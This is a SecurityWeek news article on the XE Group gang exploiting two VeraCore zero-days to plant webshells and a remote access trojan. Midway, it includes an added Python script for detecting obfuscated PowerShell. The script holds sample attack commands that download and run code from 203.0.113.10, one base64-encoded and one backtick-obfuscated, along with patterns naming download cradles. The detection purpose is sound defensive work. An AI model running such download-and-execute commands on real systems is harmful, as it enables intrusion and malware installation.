SecurityWeek

Fraud & Identity Theft

XE Group Cybercrime Gang Moves from Credit Card Skimming to Zero-Day Exploits

Vietnamese cybercrime gang shifts from credit card skimming to exploiting at least two zero-day vulnerabilities in an enterprise software product.

Malware hunters have caught a known Vietnamese cybercrime gang called XE Group shifting tactics beyond credit card skimming to exploiting at least two zero-day vulnerabilities in a widely deployed enterprise software product.

A joint investigation by researchers from Intezer and Solis Security is warning that XE Group targeted VeraCore, a platform used by fulfillment companies, commercial printers, and e-retailers to manage orders and operations. The investigators found evidence the group exploited two previously unknown vulnerabilities — one in upload validation and another in SQL processing — to gain and maintain unauthorized access.

According to a research paper, XE Group exploited two zero-day vulnerabilities in the VeraCore application to bypass security controls and deploy webshells to exfiltrate configuration files and move laterally within infected networks.

In an interesting twist the researchers found that the same system had been compromised before — in January 2020, attackers exploited a similar vulnerability, gaining valid credentials that later facilitated the reactivation of webshells in 2024.

Threat hunters have flagged XE Group as a Vietnamese-origin cybercriminal threat actor typically seen breaking into externally facing services via known exploits and monetizing those compromises by installing password-theft or credit card-skimming code on the web services tied to those servers.

While the gang has historically focused on credit card skimming and password theft, the research from Intezer and Solis Security underscores a significant shift toward targeted information theft and supply chain attacks, specifically aimed at the manufacturing and distribution sectors.


In the latest attacks, XE Group was seen exfiltrating web application configuration files, attempting to access remote systems, and deploying a Remote Access Trojan (RAT) using obfuscated PowerShell commands. 
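The obfuscated PowerShell noted above is a detection opportunity regardless of which application was the entry point: the encoded form that powershell.exe accepts via -EncodedCommand is base64 over the UTF-16LE script, so a defender can decode it from process-creation telemetry and match the recovered script against download-cradle and Invoke-Expression patterns. The following is an added example written for this page, not code from Intezer, Solis Security or the report; the command lines it scans are constructed samples in the style of Sysmon Event ID 1 / Windows 4688 CommandLine fields, and the indicator names and the 203.0.113.10 address are illustrative assumptions.

```python
import base64
import re

# Added detection example (not code from the Intezer / Solis Security report).
# It flags PowerShell command lines that carry -EncodedCommand or backtick
# obfuscation, decodes the payload and reports download-cradle / IEX patterns.

# Matches -e, -ec, -enc, -encodedcommand, ... followed by the base64 token.
# "-ex" / "-ep" (ExecutionPolicy) do not match because "\s+" must follow.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")
BACKTICK_RE = re.compile(r"[A-Za-z]`[A-Za-z]")  # I`E`X-style escape obfuscation

INDICATORS = {
    "invoke-expression": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "download-cradle": re.compile(
        r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer"),
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "nested-base64": re.compile(r"(?i)FromBase64String"),
}


def _encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (assumption: not real telemetry).
BENIGN = [
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\ops\\rotate-logs.ps1",
]
STAGER = ("$c=New-Object Net.WebClient;"
          "IEX $c.DownloadString('http://203.0.113.10/stage.ps1')")
SUSPICIOUS = [
    "powershell.exe -nop -w hidden -enc " + _encode_ps(STAGER),
    "powershell.exe -NonI -W Hidden -e " + _encode_ps(
        "$b=[Convert]::FromBase64String('SGVsbG8=');"
        "Invoke-Expression ([Text.Encoding]::UTF8.GetString($b))"),
    "powershell.exe -c I`E`X (New-Object Net.WebClient).DownloadFile("
    "'http://203.0.113.10/r.exe','C:\\Users\\Public\\r.exe')",
]


def extract_encoded_token(cmdline: str):
    """Return the base64 argument of -EncodedCommand (any abbreviation), or None."""
    m = ENCODED_RE.search(cmdline)
    return m.group(1) if m else None


def decode_powershell_b64(token: str):
    """Decode a -EncodedCommand payload; None if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Decode any encoded payload and collect indicator names for one command line."""
    token = extract_encoded_token(cmdline)
    decoded = decode_powershell_b64(token) if token else None
    hits = []
    if token:
        hits.append("encoded-command")
        if decoded is None:
            hits.append("undecodable-payload")  # truncated or foreign payload: still review it
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    if BACKTICK_RE.search(text):
        hits.append("backtick-obfuscation")
    normalized = text.replace("`", "")  # I`E`X -> IEX before keyword matching
    hits.extend(name for name, rx in INDICATORS.items() if rx.search(normalized))
    return {"cmdline": cmdline, "decoded": decoded, "indicators": sorted(hits)}


def scan(cmdlines) -> list:
    """Return only the analyses that carry at least one indicator."""
    return [a for a in map(analyze, cmdlines) if a["indicators"]]


if __name__ == "__main__":
    for finding in scan(BENIGN + SUSPICIOUS + ["powershell.exe -enc AAAA"]):
        print(finding["indicators"], "<-", finding["cmdline"][:60])
        if finding["decoded"]:
            print("   decoded:", finding["decoded"])
```

The backtick normalization matters: PowerShell drops backticks inside bare words, so `I`E`X` executes as `IEX`, and keyword matching on the raw string alone would miss it. Decoding rather than merely flagging `-enc` also lets the same rule set cover both the encoded stager and a plaintext download cradle.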

Intezer and Solis Security say they are currently working with affected vendors but note that, at the time of publication, no CVE identifiers were available despite attempts at coordinated disclosure.

UPDATE (February 3; 4:00PM EST): The researchers have updated the bulletin with identifiers for the two VeraCore vulnerabilities: CVE-2024-57968 — Upload Validation Vulnerability and CVE-2025-25181 — SQL Injection.

Related: Cybercriminals, APT Exploited Telerik Vulnerability in Attacks on US Government Agency

Related: Dozens of Exploited Vulnerabilities Missing From CISA ‘Must Patch’ List

Related: Intezer Documents Powerful ‘Lightning Framework’ Linux Malware

Related: CISA Warns of Two Mitel Vulnerabilities Exploited in Wild

Written By

Ryan Naraine is Editor-at-Large at SecurityWeek and host of the popular Security Conversations podcast series. He is a security community engagement expert who has built programs at major global brands, including Intel Corp., Bishop Fox and GReAT. Ryan is a founding-director of the Security Tinkerers non-profit, an advisor to early-stage entrepreneurs, and a regular speaker at security conferences around the world.
